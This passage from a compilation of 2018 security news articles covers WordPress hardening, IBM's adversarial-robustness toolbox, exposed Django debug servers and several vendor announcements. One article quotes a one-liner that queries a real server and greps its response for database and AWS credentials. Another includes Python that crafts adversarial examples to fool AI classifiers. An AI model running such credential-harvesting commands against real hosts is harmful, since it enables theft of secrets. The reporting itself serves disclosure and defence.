All SSL certificates have an expiration date, meaning they’ll need to be reissued. In some cases you’ll need to manually approve or cancel your certificate. Because each hosting provider handles things a bit differently, you should go to yours for more information. Alternatively, go to the Bluehost site, where there is a whole section on how to accept the new SSL certificate into your application.

It’s also worth noting that an SSL certificate will affect how your website ranks on Google, because sites which incorporate SSL are considered more secure – ultimately leading to more traffic.

6. Backup your WordPress website
We briefly mentioned this point before, but just to emphasize its importance: you have to get into the habit of organizing scheduled backups. Why is it important? Because, for example, if your site is compromised, you’ll be able to restore a prior version without losing your data. There are multiple automated solutions out there, including BackupBuddy, VaultPress, and many others.

Another great piece of advice is to use a reliable hosting solution that ensures consistent backups of your information, helping you achieve greater peace of mind. For example, Bluehost is excellent at protecting your business from involuntary data loss. To learn more and use their coupon to get a discount, go to the site.

7. Cut Back on Plugin Use
Although it may seem hard, you should make the effort to limit the total number of plugins you install on your site. You need to be picky, because it’s not just about security – it’s about overall performance.

To better explain, loading your website with numerous plugins will slow it down significantly. Thus, if you don’t need it, take the minimalist approach and skip it. Also, the fewer plugins you have, the fewer chances you give hackers to access your info. Two birds with one stone.

8. Hide Author Usernames
When you leave the WordPress defaults just as they are, it can be effortless to find the author’s username. Moreover, it’s not uncommon that the primary author on the site is also the administrator, which makes things even easier for hackers. Whenever you hand your information to hackers on a silver platter, you maximize the chances that your site will eventually be compromised.

According to experts, including the well-regarded DreamHost, it’s good practice to hide the author’s username. It’s relatively easy to achieve: you just need to add some code to your site. Once that is done and dusted, the code acts as a curtain or veil – anyone probing for the admin’s information won’t see it displayed and will instead be sent back to your homepage.


IBM Releases Open Source AI Security Tool
17.4.2018 securityweek Security

IBM today announced the release of an open source software library designed to help developers and researchers protect artificial intelligence (AI) systems against adversarial attacks.

The software, named Adversarial Robustness Toolbox (ART), helps experts create and test novel defense techniques, and deploy them on real-world AI systems.

There have been significant developments in the field of artificial intelligence in the past years, up to the point where some of the world’s tech leaders issued a warning about how technological advances could lead to the creation of lethal autonomous weapons.

Some of the biggest advances in AI are a result of deep neural networks (DNN), sophisticated machine learning models inspired by the human brain and designed to recognize patterns in order to help classify and cluster data. DNN can be used for tasks such as identifying objects in an image, translations, converting speech to text, and even for finding vulnerabilities in software.

While DNN can be highly useful, one problem with the model is that it’s vulnerable to adversarial attacks. These types of attacks are launched by giving the system a specially crafted input that will cause it to make mistakes.

For example, an attacker can trick an image recognition software to misclassify an object in an image by adding subtle perturbations that are not picked up by the human eye but are clearly visible to the AI. Other examples include tricking facial recognition systems with specially designed glasses, and confusing autonomous vehicles by sticking patches onto traffic signs.

AI adversarial attack - Credit: openai.com

IBM’s Python-based Adversarial Robustness Toolbox aims to help protect AI systems against these types of threats, which can pose a serious problem to security-critical applications.

According to IBM, the platform-agnostic library provides state-of-the-art algorithms for creating adversarial examples and methods for defending DNNs against them. The software can measure the robustness of a DNN, harden it by augmenting the training data with adversarial examples or by modifying its architecture to prevent malicious signals from propagating through its internal representation layers, and perform runtime detection to identify potentially malicious input.
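
As a small illustration of how the library is typically driven (a sketch based on ART’s published examples – the model and data are placeholders, and exact class and parameter names may differ between ART versions):

    import numpy as np
    from art.attacks.evasion import FastGradientMethod
    from art.estimators.classification import SklearnClassifier
    from sklearn.linear_model import LogisticRegression

    # Placeholder data: 100 samples, 20 features, 2 classes.
    x = np.random.rand(100, 20).astype(np.float32)
    y = np.random.randint(0, 2, 100)

    classifier = SklearnClassifier(model=LogisticRegression().fit(x, y))

    # Craft adversarial examples with the Fast Gradient Method, then measure
    # how far accuracy drops - one way to benchmark a model's robustness.
    attack = FastGradientMethod(estimator=classifier, eps=0.1)
    x_adv = attack.generate(x=x)
    print('accuracy on adversarial inputs:',
          np.mean(classifier.predict(x_adv).argmax(axis=1) == y))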

“With the Adversarial Robustness Toolbox, multiple attacks can be launched against an AI system, and security teams can select the most effective defenses as building blocks for maximum robustness. With each proposed change to the defense of the system, the ART will provide benchmarks for the increase or decrease in efficiency,” explained IBM’s Sridhar Muppidi.

IBM also announced this week that it has added intelligence capabilities to its incident response and threat management products.


Symantec Releases Targeted Attack Analytics Tool
16.4.2018 securityweek Security

Symantec is releasing its own targeted attack analytics (TAA) tool to existing Symantec Advanced Threat Protection (ATP) customers free of additional charge. It is the same tool that Symantec's researchers use, and was used to uncover Dragonfly 2.0. Its primary purpose is to uncover stealthy and targeted attacks.

Symantec's data scientists developed TAA by applying machine learning to the processes, knowledge and capabilities of the firm's own security experts and researchers. These researchers have a long and successful history of detecting and analyzing global cyber threats. The reasoning behind TAA was to automate the analysis of the vast pool of telemetry gathered from the Symantec global customer base, applying the expertise of its human researchers; that is, to automate those tasks previously performed by human analysts -- finding more things, faster, with the help of advanced analytics.

Now made available to customers, TAA analyzes incidents within the network against incidents discovered within one of the largest threat data lakes in the world. Since its inception, TAA has been used by Symantec to detect security incidents at more than 1,400 organizations, and to help track around 140 organized hacking groups.

It functions by uncovering suspicious activity in individual endpoints and collating that information to determine whether individual actions indicate stealthy malicious activity. "Security has changed a lot over the last couple of decades," commented Eric Chien, distinguished engineer at Symantec, in a blog post. "It used to be a question of defending a single machine and making sure that it was protected. That's no longer the case."

This is particularly relevant to today's stealthy, targeted attacks. With criminals increasingly making use of built-in OS tools in fileless attacks, individual actions on one endpoint need to be analyzed in the context of actions on other systems. Kevin Haley, director of Symantec's Security Technology and Response Group comments, "You have to bring your security data together because if something is happening in one place and something else is happening in another, by themselves that may not have meaning."

"Symantec's team of cyber analysts has a long history of uncovering the world's most high-profile cyber-attacks and now their deep understanding of how these attacks unfold can be put to use by our customers without the need to employ a team of researchers," said Greg Clark, Symantec CEO. "Targeted Attack Analytics uses advanced analytics and machine learning to help shorten the time to discovery on the most targeted and dangerous attacks and to help keep customers and their data safe."

TAA continuously learns from and adapts to the evolving attack methods used by increasingly sophisticated criminals and nation-state actors, and the cloud-based approach enables the frequent re-training and updating of analytics to adapt to the new attack methods without the need for product updates.

"Up until now, we've had the telemetry and data necessary to uncover the warning signs of dangerous targeted attacks, but the industry has lacked the technology to analyze and code the data quickly," said Chien. "With TAA, we're taking the intelligence generated from our leading research teams and uniting it with the power of advanced machine learning to help customers automatically identify these dangerous threats and take action."

TAA, says the blog, "merges the best threat hunting talent in the business with machine learning and AI and productizes it, putting in our customers hands, the most sophisticated advance threat detection possible." It is available now as part of Symantec's Integrated Cyber Defense Platform for Symantec Advanced Threat Protection (ATP) customers.


Improved Visibility a Top Priority for Security Analysts
6.4.2018 securityweek  Security

Security Analysts Require Improved Visibility as well as Improved Threat Detection

Vendors listen to existing and potential customers to understand how to improve their products over time. At the smallest level, they use focus groups. At the largest level, they employ market research firms to query thousands or more respondents in relevant roles and industry sectors. Somewhere in between, they run their own relatively small-scale surveys, primarily for their own benefit.

This is what Boston, MA-based next-gen endpoint protection firm Barkly did, querying some 70 IT and security professionals to understand what mid-market users look for and are not currently getting from their endpoint security controls. Not surprisingly, 60% of the respondents say that adding to or improving protection is their top priority -- possibly because 88% of them consider that there are types of attacks (for example, the growing practice of employing fileless attacks) that current security simply does not block.

More surprising, however, is that 40% of the respondents rank improving forensic and response capabilities as their current top priority. This may partly be driven by the new breed of regulations -- and in particular, GDPR -- that demand increasingly rapid incident disclosure, and remediation of the breach vector to prevent repeats.

Alternatively, this may simply be down to a high ratio of alerts (including both true positives and false positives) to human resources with their current products. While the sample size of the survey is small, forty-five percent of the respondents, Barkly says, "admit they currently don’t have enough time to investigate and respond to the incidents they’re already seeing now. Adding to that workload with complex endpoint detection and response (EDR) solutions without considering current limitations is obviously not a productive answer."

The need for improved automation to reduce the time for manual involvement also shows in users' top frustrations with current solutions. Twenty-seven percent of the respondents are concerned with poor visibility into incidents, and 25% are concerned about limited investigative/response features. A further 18% find current solutions difficult and time-consuming to manage.

The need to make incident response faster and simpler is the driving force behind Barkly's new version 3.0 launched today. Rapid response comes from two new features: endpoint isolation, and file quarantine and delete. The first enables an administrator to instantly remove an affected device from the network while the incident is investigated.

This is a one-click operation via the Barkly CommandIQ management portal, and can be enacted from any location, on- or off-site at any time via any remote or mobile device with internet access. As soon as the affected device is cleaned or confirmed to be clean, it can just as easily be returned to the network. It means that both an alert and its response can be handled instantly without requiring the security administrator to be in his office or to return to his office first.

The second feature automatically quarantines a blocked malicious executable. This instantly contains the threat, but maintains administrative access to the file for further investigation before deletion. Again, this can be performed either from the administrator's office desktop, or remotely via a mobile device.

A further two new features help analysts to investigate incidents. The first provides an automated interactive method for users to provide context, which is fed back to the analyst, whenever a file or process is blocked. The second is Incident Path Visualization, enabling analysts to trace malicious processes back to their origins.

Together, these features provide rapid forensic insight into the cause of the incident, allowing the security team to leverage the insights gained to improve their security going forwards.

Barkly version 3.0 adds the ability for automated and rapid response to its existing machine-learning threat detection engine. Its ability to do this via any mobile device means there is no delay if an incident occurs while administrators are off-site. The intention is to enable existing staff levels to handle workloads more efficiently without being stretched too thin, and without requiring additional company manpower.


Grindr shared people’ HIV status with other companies
3.4.2018 securityaffairs Security

An analysis conducted by the Norwegian research nonprofit SINTEF revealed that the popular Grindr gay dating app is sharing its users’ HIV status with two other companies.
Grindr gay-dating app made the headlines again, a few days ago an NBC report revealed that the app was affected by 2 security issues (now patched) that could have exposed the information of its more than 3 million daily users.

An attacker could have exploited the feature to access location data, private messages to other users, and profile information, even if they’d opted out of sharing such information.

The security issues were identified by Trever Faden, CEO of the property management startup Atlas Lane, while he was working at his website C*ckblocked that allowed users to see who blocked them on Grindr.

Faden discovered that once a Grindr user logged in to his service, it was possible to access a huge quantity of data related to their Grindr account, including unread messages, email addresses, and deleted photos.

While the media were sharing the news, another disconcerting revelation emerged: according to BuzzFeed and the Norwegian research nonprofit SINTEF, Grindr has been sharing data on whether its users have HIV with two outside companies.

“SVT and SINTEF conducted an experiment the 7th of February 2018 to analyse privacy leaks in the dating application Grindr. This was realised for the Swedish TV program “Plus granskar“, that you may watch online.” reported SINTEF.

“We discovered that Grindr contains many trackers, and shares personal information with various third parties directly from the application.”

Grindr HIV data

Profiles include sensitive information such as HIV status, when the user was last tested, and whether they’re taking HIV treatment or the HIV-preventing pill PrEP.

“It is unnecessary for Grindr to track its users HIV Status using third-parties services. Moreover, these third-parties are not necessarily certified to host medical data, and Grindr’s users may not be aware that they are sharing such data with them.” added SINTEF.

The disconcerting aspect of this revelation is that Grindr has been sharing users’ HIV statuses and test dates with two companies that help optimize the app, called Apptimize and Localytics.

“The two companies — Apptimize and Localytics, which help optimize apps — receive some of the information that Grindr users choose to include in their profiles, including their HIV status and “last tested date.” BuzzFeed reports

“Because the HIV information is sent together with users’ GPS data, phone ID, and email, it could identify specific users and their HIV status, according to Antoine Pultier, a researcher at the Norwegian nonprofit SINTEF, which first identified the issue.”

In some cases, this data was not protected by encryption.

Hours after BuzzFeed’s report, Grindr told Axios that it had made a change to stop sharing users’ HIV status. The company’s security chief, Bryce Case, told Axios that he felt the company was being “unfairly … singled out” in light of Facebook’s Cambridge Analytica scandal and said that the company’s practices didn’t deviate from the industry norm.

Grindr’s chief technology officer, Scott Chen, pointed out that data was shared “under strict contractual terms that provide for the highest level of confidentiality, data security, and user privacy.”

Grindr also pointed out that it doesn’t sell user data to third parties.

In a statement released Monday afternoon, Grindr confirmed that it would stop sharing the HIV data.

The company also confirmed to CNNMoney that it has already deleted HIV data from Apptimize, and is in the process of removing it from Localytics.


Tens of thousands of misconfigured Django apps leak sensitive data
31.3.2018 securityaffairs Security

The security researcher Fábio Castro discovered tens of thousands of Django apps that expose sensitive data because developers forget to disable the debug mode.
Security researchers have discovered misconfigured Django applications that are exposing sensitive information, including passwords, API keys, or AWS access tokens.

Django is a very popular high-level Python Web framework that allows rapid development of Python-based web applications.

The researcher Fábio Castro explained that installs expose data because developers forget to disable the debug mode for the Django app.


Castro announced the findings on Twitter (@6IX7ine) on March 27, 2018:

28,165 thousand django running servers are exposed on the internet, many are showing secret API keys, database passwords, amazon AWS keys.

A small line http GET http://54.251.149.60:8081/ --body | grep 'DATABASE_URL\|Mysql\|AWS' #Shodan #django #hacking #cybersecurity #infosec
Castro found the 28,165 apps by querying Shodan for Django installs that have debug mode enabled.

I made the same query a few hours later and I obtained 28,911 results.

Django apps

Many servers with debug mode enabled expose very sensitive data; the expert discovered server passwords and AWS access tokens that could be used by hackers to gain full control of the systems.

“I found this as I was working with the Django framework on a small project,” Castro told Bleeping Computer. “I noticed some error exception and then went searching on Shodan.”

“The main reason [for all the exposures] is the debug mode enabled,” Castro says. “This is not a failure from Django’s side. My recommendation is to disable debugging mode when deploying the application to production.”
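
Following that recommendation is a two-line change in the project’s settings file (a minimal sketch; the domain is a placeholder):

    # settings.py - production configuration
    DEBUG = False                        # never expose tracebacks or settings values
    ALLOWED_HOSTS = ['app.example.com']  # required once DEBUG is off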


Kaspersky Open Sources Internal Distributed YARA Scanner
28.3.2018 securityweek Security

Kaspersky Lab has released the source code of an internally-developed distributed YARA scanner as a way of giving back to the infosec community.

Originally developed by VirusTotal software engineer Victor Alvarez, YARA is a tool that allows researchers to analyze and detect malware by creating rules that describe threats based on textual or binary patterns.
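
As a minimal illustration of what such a rule looks like, here is a toy example driven through the yara-python bindings (the rule and the marker string are hypothetical):

    import yara

    # A toy rule: match any input containing the marker string.
    rules = yara.compile(source='''
    rule ExampleMarker
    {
        strings:
            $a = "evil_c2_beacon"
        condition:
            $a
    }
    ''')

    # Standalone, the bindings can scan an in-memory buffer or a file;
    # KLara's contribution is distributing this matching across many workers.
    print(rules.match(data=b'header ... evil_c2_beacon ... trailer'))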

Kaspersky Lab has developed its own version of the YARA tool. Named KLara, the Python-based application relies on a distributed architecture to allow researchers to quickly scan large collections of malware samples.

Looking for potential threats in the wild requires a significant amount of resources, which can be provided by cloud systems. Using a distributed architecture, KLara allows researchers to efficiently scan one or more YARA rules over large data collections – Kaspersky says it can scan 10Tb of files in roughly 30 minutes.

“The project uses the dispatcher/worker model, with the usual architecture of one dispatcher and multiple workers. Worker and dispatcher agents are written in Python. Because the worker agents are written in Python, they can be deployed in any compatible ecosystem (Windows or UNIX). The same logic applies to the YARA scanner (used by KLara): it can be compiled on both platforms,” Kaspersky explained.

KLara provides a web-based interface where users can submit jobs, check their status, and view results. Results can also be sent to a specified email address.

The tool also provides an API that can be used to submit new jobs, get job results and details, and retrieve the matched MD5 hashes.

Kaspersky Lab has relied on YARA in many of its investigations, but one of the most notable cases involved the 2015 Hacking Team breach. The security firm wrote a YARA rule based on information from the leaked Hacking Team files, and several months later it led to the discovery of a Silverlight zero-day vulnerability.

The KLara source code is available on GitHub under a GNU General Public License v3.0. Kaspersky says it welcomes contributions to the project.

This is not the first time Kaspersky has made available the source code of one of its internal tools. Last year, it released the source code of Bitscout, a compact and customizable tool designed for remote digital forensics operations.


GitHub Security Alerts are keeping developers’ code safer
23.3.2018 securityaffairs Security

The code hosting service GitHub confirmed that the introduction of GitHub security alerts in November allowed to obtain a significant reduction of vulnerable code libraries on the platform.
GitHub alerts warn developers when their projects include certain flawed software libraries and provide advice on how to address the issue.

Last year GitHub first introduced the Dependency Graph, a feature that lists all the libraries used by a project. The feature supports JavaScript and Ruby, and the company plans to add support for Python this year.

GitHub Security Alerts

The GitHub security alerts feature introduced in November is designed to alert developers when one of their project’s dependencies has known flaws. The Dependency graph and the security alerts feature have been automatically enabled for public repositories, but they are opt-in for private repositories.

The availability of a dependency graph allows notifying the owners of the projects when it detects a known security vulnerability in one of the dependencies and suggests known fixes from the GitHub community.

The new feature analyzes vulnerable Ruby gems and JavaScript NPM packages based on MITRE’s Common Vulnerabilities and Exposures (CVE) list. Every time a new vulnerability is discovered, it is added to this list, and all repositories that use the affected version are identified and their maintainers informed.
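
Conceptually, the matching step is a simple set intersection between a project’s declared dependencies and the list of known-vulnerable versions. A minimal sketch (package names and versions are made up for illustration):

    # Known-vulnerable (package, version) pairs, e.g. derived from CVE data.
    KNOWN_VULNERABLE = {('some-gem', '1.0.3'), ('some-npm-package', '4.17.4')}

    project_deps = [('some-npm-package', '4.17.4'), ('another-package', '2.1.0')]

    for name, version in project_deps:
        if (name, version) in KNOWN_VULNERABLE:
            print(f'ALERT: {name} {version} has a known vulnerability')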

“Vulnerabilities that have CVE IDs (publicly disclosed vulnerabilities from the National Vulnerability Database) will be included in security alerts. However, not all vulnerabilities have CVE IDs—even many publicly disclosed vulnerabilities don’t have them.” states GitHub.

“This is the next step in using the world’s largest collection of open source data to help you keep code safer and do your best work. The dependency graph and security alerts currently support Javascript and Ruby—with Python support coming in 2018.”

GitHub users can choose to receive the alerts via the user interface or via email.

An initial scan conducted by GitHub revealed more than 4 million vulnerabilities in more than 500,000 repositories. GitHub notified the affected users, and by December 1 more than 450,000 of the vulnerabilities had been addressed, either by updating the affected library or removing it altogether.

According to GitHub, vulnerabilities are in a vast majority of cases addressed within a week by active developers.

“By December 1 and shortly after we launched, over 450,000 identified vulnerabilities were resolved by repository owners either removing the dependency or changing to a secure version.” GitHub said. “Additionally, 15 percent of alerts are dismissed within seven days—that means nearly half of all alerts are responded to within a week. Of the remaining alerts that are unaddressed or unresolved, the majority belong to repositories that have not had a contribution in the last 90 days.”


Cisco Meraki Offers Up to $10,000 in Bug Bounty Program
19.3.2018 securityweek Security

Cisco Meraki, a provider of cloud-managed IT solutions, announced last week the launch of a public bug bounty program with rewards of up to $10,000 per vulnerability.

Cisco Meraki, which resulted from Cisco’s acquisition of Meraki in late 2012, started with a private bug bounty program on the Bugcrowd platform. The private program led to the discovery of 39 flaws, for which the company paid out an average of roughly $1,100.

The firm has now decided to open its bug bounty program to all the white hat hackers on Bugcrowd and it’s prepared to pay them between $100 and $10,000 per flaw.

The initiative covers the meraki.com, ikarem.io, meraki.cisco.com and network-auth.com domains and some of their subdomains, the Meraki Dashboard mobile apps for Android and iOS, and products such as the Cisco Meraki MX Security Appliances, Meraki MS Switches, MR Access Points, MV Security Cameras, MC Phones, Systems Manager, and Virtual Security Appliances.

The highest rewards can be earned for serious vulnerabilities in websites (except meraki.cisco.com), and all hardware and software products. Researchers can receive between $6,000 and $10,000 for remote code execution, root logic, sensitive information disclosure, and device configuration hijacking issues.

There is a long list of security issues that are not covered by the program, including denial-of-service (DoS) attacks, SSL-related problems and ones that require man-in-the-middle (MitM) access, clickjacking, and classic self-XSS.

“We invest heavily in tools, processes and technologies to keep our users and their networks safe, including third party audits, features like two-factor authentication and our out-of-band cloud management architecture,” said Sean Rhea, engineering director at Cisco Meraki. “The Cisco Meraki vulnerability rewards program is an important component of our security strategy, encouraging external researchers to collaborate with our security team to help keep networks safe.”

Meraki says its wireless, switching, security, and communications products are used by more than 230,000 global customers for 3 million devices.


GitHub Paid $166,000 in Bug Bounties in 2017

16.3.2018 securityweek Security

Git repository hosting service GitHub paid a total of $166,495 in rewards in 2017 to security researchers reporting vulnerabilities as part of its four year old bug bounty program.

Total payouts more than doubled compared to the $81,700 paid in 2016 and were nearly equal to the total bounties paid during the first three years of the program: $177,000. During the first two years of the program, the company paid $95,300 in bug bounties.

Throughout the year, the company received a total of 840 submissions to the program, but resolved and rewarded only 121 of them (15%). In 2016, GitHub rewarded 73 of the 795 valid reports it received, with only 48 submissions deemed of high enough severity to appear on the bug bounty program’s page.

The number of valid reports fueled the increase in total payouts and also resulted in GitHub re-evaluating its payout structure in October 2017. Thus, the bug bounties were doubled, with the minimum and maximum payouts now at $555 and $20,000.

With continuous growth in researcher participation, program initiatives, and the rewards paid out, 2017 proved the program’s biggest year yet, GitHub’s Greg Ose points out.

Last year, the company also announced the introduction of GitHub Enterprise to the bug bounty program, allowing researchers to find vulnerabilities in areas that may not be exposed on GitHub.com or which are specific to enterprise deployments.

“In the beginning of 2017, a number of reports impacting our enterprise authentication methods prompted us to not only focus on this internally, but also identify how we could engage researchers to focus on this functionality,” Ose notes.

He also says GitHub has launched its first researcher grant, an initiative the company has been long focused on. This effort involves paying “a fixed amount to a researcher to dig into a specific feature or area of the application.” Any discovered vulnerability would also be rewarded through the Bug Bounty program.

Last year, GitHub also rolled out private bug bounties, which allowed it to limit the impact of vulnerabilities in production. The company also rolled out internal improvements to the program, to more efficiently triage and remediate submissions and plans on refining the process in 2018 as well.

GitHub is looking to expand the initiatives that proved successful in 2017, launching more private bounties and research grants to gain focus on various features before and after they publicly launch. The company also plans additional promotions later this year.

“Given the program’s success, we’re also looking to see how we can expand its scope to help secure our production services and protect GitHub’s ecosystem. We’re excited for what’s next and look forward to triaging and fixing your submissions this year,” Ose concludes.


Vast Majority of Symantec Certificates Already Replaced: DigiCert
15.3.2018 securityweek Security

Less than 1% of the top 1 million websites have yet to replace Symantec-issued certificates before major browsers distrust them, DigiCert announced this week.

Last year, DigiCert bought the Certification Authority (CA) business run by Symantec, one of the oldest and largest CAs, after a series of issues observed over the past couple of years triggered major browser vendors to announce plans to remove trust in digital certificates issued by the CA.

Later this year, both Chrome and Firefox will stop trusting certificates issued by Symantec, and others might follow suit. The move will affect all certificates issued before DigiCert acquired the Symantec CA division, including those issued under the GeoTrust, RapidSSL, Thawte, and VeriSign brands.

DigiCert, which said last year it would ensure the newly acquired division does not repeat past errors, is determined to help all website owners obtain replacement certificates and says the process is nearly complete.

Fewer than 1% of the top 1 million sites still use Symantec-issued certificates that will be affected by the upcoming browser distrust action. According to DigiCert, it is ready to help their owners get replacement certificates before the beta releases of Firefox 60 and Chrome 66 in the next couple of months.

“Certificates replaced by DigiCert ahead of Chrome 66 distrust timelines will also satisfy Mozilla Firefox requirements,” the company says.

Last year, Google announced plans to distrust all Symantec certificates with the release of Chrome 70, while Mozilla said earlier this week it would make a similar move with the release of Firefox 63 in October 2018.

In preparation for this action, DigiCert started issuing trusted certificates for the Symantec, Thawte, GeoTrust and RapidSSL brands on Dec. 1, 2017. Since then, the company has issued millions of certificates, including new and free replacement certificates, and says that “the vast majority of Symantec brand certificate holders have taken corrective action.”

To receive replacement certificates, customers need to go through a typical renewal process in the portal where they made the original purchase. DigiCert offers the replacements for free, valid through the original certificate’s validity period.

A web tool is available to help identify impacted certificates: simply entering a domain name confirms whether it runs a Symantec-issued certificate that needs to be replaced. The tool can help organizations identify any certificate affected by the release of Chrome 70 and Firefox 63 later this year.
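
For readers who prefer a quick programmatic check, a minimal sketch of the same idea is shown below in Python. It inspects the organization name in a site’s certificate issuer and matches it against the legacy brands named in this article. Note that this issuer-name match is only a rough heuristic invented for illustration: browsers actually distrust specific Symantec root certificates, and this is not DigiCert’s tool.

import socket
import ssl

# Legacy Symantec-family brands named in this article (heuristic only).
LEGACY_BRANDS = ("Symantec", "GeoTrust", "RapidSSL", "Thawte", "VeriSign")

def issuer_organization(hostname, port=443):
    """Fetch a host's leaf certificate and return the issuer's organization."""
    context = ssl.create_default_context()
    with socket.create_connection((hostname, port), timeout=5) as sock:
        with context.wrap_socket(sock, server_hostname=hostname) as tls:
            cert = tls.getpeercert()
    # getpeercert() returns the issuer as a tuple of RDN tuples
    issuer = dict(rdn[0] for rdn in cert["issuer"])
    return issuer.get("organizationName", "")

if __name__ == "__main__":
    org = issuer_organization("example.com")
    if any(brand in org for brand in LEGACY_BRANDS):
        print(f"Issuer '{org}' looks Symantec-branded; check for a replacement.")
    else:
        print(f"Issuer '{org}' is not flagged by this heuristic.")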

All Symantec certificates issued before June 2016 will be distrusted in Chrome 66 and Firefox 60, which arrive in April and May, respectively. Certificates Symantec issued between June 1, 2016 and Nov. 30, 2017 will be distrusted in Chrome 70 and Firefox 63, both due in October.

“We’ve been working hard for months to make sure that customers are aware of the Chrome and Mozilla deadlines and that they can replace Symantec-issued certificates through us for free. Through comprehensive communications and tools in multiple languages, alongside our partners, we are continuing to provide instructions and the simplest replacement path available for those who still need to act,” Jeremy Rowley, chief of product for DigiCert, said.

All of the certificates that DigiCert has issued for Symantec, Thawte, GeoTrust and RapidSSL brands since Dec. 1, 2017 are fully trusted by the browsers.


Google Reviews Over 50 Billion Android Apps Daily
15.3.2018 securityweek Security

Play Protect, the security service that arrived on Android last year, reviews more than 50 billion apps each day, Google claims.

Launched in May 2017, Google Play Protect brings together various security services for Android, many of which had been available for years but were not as visible as they are now. Mainly designed to protect users from Potentially Harmful Apps (PHAs), it reviews not only billions of apps but also other potential sources of PHAs, as well as user devices, taking action when necessary.

Play Protect was designed to automatically check Android devices for PHAs at least once a day, and it also lets users run additional scans at any time. Thanks to these daily checks, nearly 39 million PHAs were removed last year, the Internet giant reveals.

According to Google, Play Protect uses various tactics to keep users and their data safe, including machine learning, which helped detect 60.3% of all Potentially Harmful Apps, a percentage expected to increase in the future.

Play Protect also receives updates to harden it against malicious trends detected across the ecosystem, the company says. Because nearly 35% of new PHA installations occurred while the device was not connected to a network, offline scanning was enabled in Play Protect in October 2017, preventing an additional 10 million PHA installs.

Compared to 2016, 65% more applications submitted to Google Play were reviewed. The company removed over 700,000 Android applications from Google Play last year. According to Google, users downloading apps exclusively from Play were nine times less likely to get a PHA compared to those downloading from other sources.

However, Play Protect also protects users outside Google Play, and it has decreased the installation rate of PHAs from sources other than the official store by more than 60%, Google notes in a blog post.

In addition to keeping users safe from harmful applications, Google focused on improving the process of delivering security updates for Android devices in 2017. Thus, 30% more devices received security patches than in 2016, the company says.

The Android Security Rewards Program and built-in security features of the Android platform allowed the company to patch critical security vulnerabilities in Android before they were publicly disclosed. Last year, the company also launched Google Play Security Rewards Program, which offers bonus bounties for select critical vulnerabilities in apps hosted on the official store.

Throughout 2017, Google paid $1.28 million in rewards to researchers reporting vulnerabilities in Android (over $2 million has been awarded since the program started). The top payouts for exploits targeting TrustZone and Verified Boot were increased from $50,000 to $200,000, while payouts for remote kernel exploits rose from $30,000 to $150,000.

At the 2017 Mobile Pwn2Own competition, no exploits successfully compromised the Google Pixel, while those demonstrated against devices running Android did not work on devices running unmodified Android source code from the Android Open Source Project (AOSP).

In January 2018, Google revealed that it had paid a team of researchers over $100,000 for a working remote exploit chain targeting Pixel devices.

Released in fall last year, Android Oreo brought a series of security improvements as well, including more secure network protocols, increased user control over identifiers, hardened kernel, and more.

“We’re pleased to see the positive momentum behind Android security, and we’ll continue our work to improve our protections this year, and beyond. We will never stop our work to ensure the security of Android users,” Dave Kleidermacher, Vice President of Security for Android, Play, ChromeOS, said.


Cloud Security Firm Luminate Emerges From Stealth
14.3.2018 securityweek Security

Luminate, a U.S. and Israel-based company that specializes in securing access to corporate applications in hybrid cloud environments, emerged from stealth mode on Wednesday with $14 million in funding.

The company’s Secure Access Cloud software-as-a-service (SaaS) platform relies on BeyondCorp, a zero-trust enterprise security model developed by Google that shifts access controls from the network perimeter to individual devices and users.

Specifically, Luminate provides a secure communications channel between users and corporate resources and applications stored in a hybrid cloud.

Secure Access Cloud, which the company claims can be deployed in less than five minutes, hides all corporate resources from external networks and grants access only to authenticated users on validated devices. Each connection is terminated automatically as soon as the session completes.

The solution protects not only employees, but also supply chain partners, contractors, business partners, customers, and automated processes.
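
Luminate has not published implementation details, but the access model the article describes can be illustrated with a short, hypothetical Python sketch: every request is evaluated against user authentication, device validation, and an explicit per-resource entitlement, with no implicit trust granted by network location. All names here (User, Device, is_access_allowed) are invented for illustration and are not Luminate’s API.

from dataclasses import dataclass

@dataclass
class User:
    name: str
    authenticated: bool      # e.g., verified via the identity provider
    entitlements: frozenset  # resources this user may reach

@dataclass
class Device:
    device_id: str
    validated: bool          # e.g., posture/compliance check passed

def is_access_allowed(user: User, device: Device, resource: str) -> bool:
    """Zero-trust decision: authenticated user, validated device,
    and explicit entitlement to this one resource -- nothing else."""
    return user.authenticated and device.validated and resource in user.entitlements

# A resource stays invisible unless every check passes.
alice = User("alice", True, frozenset({"erp.internal"}))
laptop = Device("laptop-42", True)
print(is_access_allowed(alice, laptop, "erp.internal"))  # True
print(is_access_allowed(alice, laptop, "hr.internal"))   # False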

The product does not require the installation of any software on end-user devices, configuration changes, or architectural modifications, and it can be easily integrated with all existing cloud and data center technologies, Luminate says.

“Luminate's solution takes the BeyondCorp philosophy as a starting point and transforms security in corporate IT networks. Luminate provides a unified security stack on all environments that allows only point-to-point, ad-hoc user access to specific corporate resources, wherever they are hosted. At no point in time is the corporate network exposed,” said Ofer Smadari, CEO of Luminate. “Our platform deploys in less than five minutes and, once in place, provides full visibility and complete governance of users' actions when accessing corporate resources.”

Luminate received a total of $14 million in seed and Series A funding from U.S. Venture Partners, Aleph Venture Capital, and ScaleUp, a Microsoft program for tech startups. The funding will be used to expand operations in the United States and develop its channels and customer base.

Luminate was founded in January 2017 by Smadari, Leonid Belkind, and Eldad Livni, and over the past 14 months it has been developing and deploying its product, which is reportedly already in use at global financial, technology, and consumer services organizations.